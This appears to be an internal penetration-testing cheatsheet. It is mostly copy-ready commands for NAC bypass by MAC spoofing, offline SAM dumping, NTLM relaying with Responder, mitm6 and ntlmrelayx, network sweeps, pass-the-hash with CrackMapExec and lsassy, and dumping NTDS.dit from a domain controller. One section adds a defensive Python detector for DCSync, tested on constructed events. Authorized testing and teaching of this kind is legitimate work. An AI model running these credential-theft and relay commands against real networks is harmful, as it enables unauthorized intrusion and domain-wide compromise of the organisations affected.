
Internal Penetration Testing

1. No network access


  • Crack WPA or crack/replay PEAP

For more details, see the next cheatsheet: WiFi

NAC - MAC filtering

  1. Spoof the MAC address, static IP and gateway IP of an authorized device (e.g. a printer or VoIP phone), then disconnect that device:
    sudo macchanger -m <authorized_mac> eth0
  2. Force your static IP to match the one the spoofed device was using:
    sudo ip addr add <static_ip>/24 dev eth0 && sudo ip route add default via <gateway_ip>

NAC - 802.1X

2. No account yet

Physical access

Boot from Kali Linux and dump creds

fdisk -l
mount /dev/<windows_disk> /mnt
# NTFS paths are case-sensitive under Linux: the hive directory is Windows\System32\config
cd /mnt/Windows/System32/config
impacket-secretsdump -system SYSTEM -sam SAM -security SECURITY LOCAL

For more details, see the next cheatsheet: Windows Post Exploitation

Network Access


Responder + NTLMrelayx

# 1. First, edit Responder.conf so that Responder does not listen on the protocols ntlmrelayx needs:
sudo vim /usr/share/responder/Responder.conf
    SMB = Off     # Turn this off
    HTTP = Off    # Turn this off

# 2. Then create a list of relay targets (hosts on which SMB signing is not required):
## For a small range
crackmapexec smb <targets> --gen-relay-list relaylistOutputFilename.txt
## For a big range
nmap -T4 -Pn -p 445 --open -oA <outfile> <targets>
cat *.gnmap | grep -i "open/tcp" | cut -d " " -f2 | sort -u > perim_up_smb.txt
crackmapexec smb perim_up_smb.txt --gen-relay-list relaylistOutputFilename.txt

# 3. Run ntlmrelayx against that list
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -smb2support --output-file relayed-hash.txt

# 4. Finally, in another shell, run Responder (from the Responder directory)
## Light
sudo ./Responder.py -I eth0
## Medium (-d: answer netbios domain suffix queries, -w: start the rogue WPAD proxy)
sudo ./Responder.py -I eth0 -dw
## Full (also force WPAD and proxy authentication)
sudo ./Responder.py -I eth0 -dwFP

If limited to a Windows system, you can use Inveigh instead of Responder.

mitm6 + NTLMrelayx

sudo mitm6 -d <domain.fqdn> --ignore-nofqdn
impacket-ntlmrelayx -tf relaylistOutputFilename.txt -6

# If no SMB target is available, try ldap/ldaps/mssql:
impacket-ntlmrelayx -t ldaps://<target> -l lootdir

ARP (use with caution!)

Cain.exe (& Abel)

Port and service scan

Hosts discovery from huge ranges

zmap on a single port (linux and windows)

# The default blacklist excludes private ranges, so it is emptied for an internal scan
sudo apt install zmap && sudo rm /etc/zmap/blacklist.conf && sudo touch /etc/zmap/blacklist.conf
# Always pass the in-scope ranges: without a target argument zmap scans the whole IPv4 address space
sudo zmap -p22 <ranges> -o zmap_linux.ips
sudo zmap -p445 <ranges> -o zmap_windows.ips

masscan on identified ranges

cat zmap_*.ips | awk -F. '{print $1"."$2"."$3".0/24"}' | sort -u > masscan_targets.ips
masscan -iL masscan_targets.ips -p 21,22,23,80,443,445,5985,5986,8080,8443,5900 -oG masscan.grep

nmap on identified hosts

# Extract the live hosts from the grepable masscan output first: nmap -iL expects one host per line
grep -oE 'Host: [0-9.]+' masscan.grep | cut -d ' ' -f2 | sort -u > masscan_hosts.txt
nmap -sV --version-all -Pn -sT --top-ports 3000 -iL masscan_hosts.txt -oA all_hosts
nmap --version-all -sV -sC -p- -oA allports <hosts>

Search for low-hanging fruit (MS17-010, default passwords on Tomcat, VNC, ...)

# Quote the script glob so the shell does not expand it
nmap -Pn -n -sSUV -vvv --reason -pT:137-139,445,U:137-139 --script='*ms17-010*' -oA SMB_MS17 <hosts>
# Metasploit modules
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/http/tomcat_mgr_login
searchsploit <service_name>

For more details, see the previous cheatsheet: External Penetration Testing

3. Unprivileged account only

Get a shell

For more details, see the next cheatsheets: Shell and AV Bypass

Local Privilege Escalation

For more details, see the next cheatsheet: Local Privilege Escalation Windows

Domain Escalation

For more details, see the next cheatsheet: Domain Escalation

4. Local Admin account


For more details, see the next cheatsheet: Local Post Exploitation Windows


For more details, see the next cheatsheet: Pivoting

Replay the secrets found

Replay a Kerberos ticket, LM/NTLM hash or cleartext password with CrackMapExec or lsassy

crackmapexec smb <host_file> -d <domain> -u <user> -H <hash> --lsa
crackmapexec smb <host_file> -d <domain> -u <user> -H <hash> --sam
lsassy <target> -d <domain> -u <user> -p <pass>

5. Domain admin account

Dump NTDS.dit from the DC

# CrackMapExec using a password
sudo crackmapexec smb <target> -u <domain_admin> -p '<pass>' --ntds

# CrackMapExec using a Kerberos ticket (-E keeps KRB5CCNAME in sudo's environment, which sudo otherwise resets)
export KRB5CCNAME=<user>.ccache
sudo -E crackmapexec smb <target> --kerberos --ntds drsuapi

# If antivirus blocks the default drsuapi method, try the vss method instead
sudo crackmapexec smb <target> -u <domain_admin> -p '<pass>' --ntds vss

# Dump the krbtgt hash only
impacket-secretsdump <domain>/<domain_admin>:'<pass>'@<target> -history -just-dc -just-user krbtgt
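A detection-side counterpart to the drsuapi (directory replication) method above, added as an example that is not part of the original cheatsheet or of CrackMapExec: it scans Event ID 4662 records for the replication control-access rights that this kind of dump exercises and flags every principal that is not a domain controller machine account. The field names are the ones a SIEM typically normalises from the Security log, and the sample events are constructed.

```python
# Well-known control-access right GUIDs that directory replication requires;
# they appear in the Properties field of a 4662 event.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

def find_dcsync(events, dc_accounts):
    """Return the 4662 events in which a non-DC principal exercised replication rights.
    events: dicts with EventID, SubjectUserName, AccessMask, Properties and Computer.
    dc_accounts: machine accounts of the domain controllers, e.g. {"DC01$", "DC02$"}."""
    expected = {a.upper() for a in dc_accounts}  # DC-to-DC replication is normal traffic
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662 or ev.get("AccessMask") != "0x100":
            continue  # 0x100 = Control Access, the mask used for extended rights
        props = ev.get("Properties", "").lower()
        rights = [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]
        if rights and ev.get("SubjectUserName", "").upper() not in expected:
            hits.append({"user": ev["SubjectUserName"], "dc": ev.get("Computer"), "rights": rights})
    return hits

# Constructed sample records (not real log data): one DC-to-DC replication, one
# unrelated 4662 on the user object class, and one replication request by a user account.
SAMPLE_EVENTS = [
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "DC02$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "AccessMask": "0x20", "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4662, "Computer": "DC01.corp.local", "SubjectUserName": "jdoe",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for hit in find_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"possible DCSync: {hit['user']} on {hit['dc']} used {', '.join(hit['rights'])}")
```

The Directory Service Access audit subcategory must be enabled on the DCs for 4662 to be logged at all; any service account legitimately granted replication rights (e.g. for Entra ID Connect) belongs in the allow-list too.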

Manual Dump

# 1) Use any tool that gives command execution on the target to create a shadow copy and copy the files out of it
#    (use the shadow copy device name that vssadmin prints; HarddiskVolumeShadowCopy1 is only the first one)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\NTDS.dit.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\SYSTEM.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Windows\SECURITY.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\SAM.bak

# 2) Use any tool that can retrieve these 4 files (smbmap takes a share-relative path)
smbmap -d <domain> -u <user> -p <pass> -H <target> --download 'C$\Windows\NTDS.dit.bak'
smbmap -d <domain> -u <user> -p <pass> -H <target> --download 'C$\Windows\SYSTEM.bak'
smbmap -d <domain> -u <user> -p <pass> -H <target> --download 'C$\Windows\SECURITY.bak'
smbmap -d <domain> -u <user> -p <pass> -H <target> --download 'C$\Windows\SAM.bak'

# 3) Parse these files locally
impacket-secretsdump -ntds NTDS.dit.bak -system SYSTEM.bak -security SECURITY.bak -sam SAM.bak LOCAL